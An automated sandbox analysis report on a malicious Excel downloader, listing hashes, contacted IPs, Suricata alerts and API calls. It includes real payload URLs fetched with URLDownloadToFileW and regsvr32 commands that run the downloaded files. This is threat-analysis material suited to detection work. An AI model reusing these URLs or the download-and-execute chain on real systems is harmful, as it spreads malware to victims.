Summary | ZeroBOX

index-295687290.xls

Downloader MSOffice File
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 5, 2021, 9:42 a.m. Nov. 5, 2021, 9:44 a.m.
Size 109.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:19:34 2015, Last Saved Time/Date: Thu Nov 4 14:50:52 2021, Security: 0
MD5 4309aadc0b51d58084832e45cba1e1dd
SHA256 d95e4db41491553a949254cc47b3f93a310fda6bd7f93e32e2d086af5427914a
CRC32 06E494EB
ssdeep 3072:JKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgiMjmwHAfvperDmW:JKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgiU
Yara
  • Microsoft_Office_File_Downloader_Zero - Microsoft Office File Downloader
  • Microsoft_Office_File_Zero - Microsoft Office File

IP Address Status Action
108.179.192.18 Active Moloch
108.179.193.34 Active Moloch
164.124.101.2 Active Moloch
23.111.163.242 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 108.179.193.34:443 -> 192.168.56.103:49165 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 23.111.163.242:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49171 -> 23.111.163.242:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49173 -> 23.111.163.242:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49171 -> 23.111.163.242:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49171 -> 23.111.163.242:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 23.111.163.242:443 -> 192.168.56.103:49173 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 23.111.163.242:443 -> 192.168.56.103:49173 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 23.111.163.242:443 -> 192.168.56.103:49171 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49167 -> 108.179.192.18:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49172 -> 23.111.163.242:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 23.111.163.242:443 -> 192.168.56.103:49171 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49172 -> 23.111.163.242:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49172 -> 23.111.163.242:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49168 -> 108.179.192.18:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 23.111.163.242:443 -> 192.168.56.103:49172 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 23.111.163.242:443 -> 192.168.56.103:49172 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49162 -> 108.179.193.34:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49164 -> 108.179.193.34:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 108.179.192.18:443 -> 192.168.56.103:49169 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6bd28000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b072000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2540
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c201000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c201000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2580
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c201000
process_handle: 0xffffffff
1 0 0
cmdline regsvr32 C:\Datop\good.good
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\good1.good
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\good.good
cmdline regsvr32 C:\Datop\good1.good
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\good2.good
cmdline regsvr32 C:\Datop\good2.good
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef60000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: https://decinfo.com.br/s4hfZyv7NFEM/y9.html
stack_pivoted: 0
filepath_r: C:\Datop\good.good
filepath: C:\Datop\good.good
2148270085 0

URLDownloadToFileW

url: https://imprimija.com.br/BIt2Zlm3/y5.html
stack_pivoted: 0
filepath_r: C:\Datop\good1.good
filepath: C:\Datop\good1.good
2148270085 0

URLDownloadToFileW

url: https://stunningmax.com/JR3xNs7W7Wm1/y1.html
stack_pivoted: 0
filepath_r: C:\Datop\good2.good
filepath: C:\Datop\good2.good
2148270085 0
parent_process excel.exe martian_process regsvr32 C:\Datop\good.good
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\good1.good
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\good.good
parent_process excel.exe martian_process regsvr32 C:\Datop\good1.good
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\good2.good
parent_process excel.exe martian_process regsvr32 C:\Datop\good2.good
file C:\Windows\System32\regsvr32.exe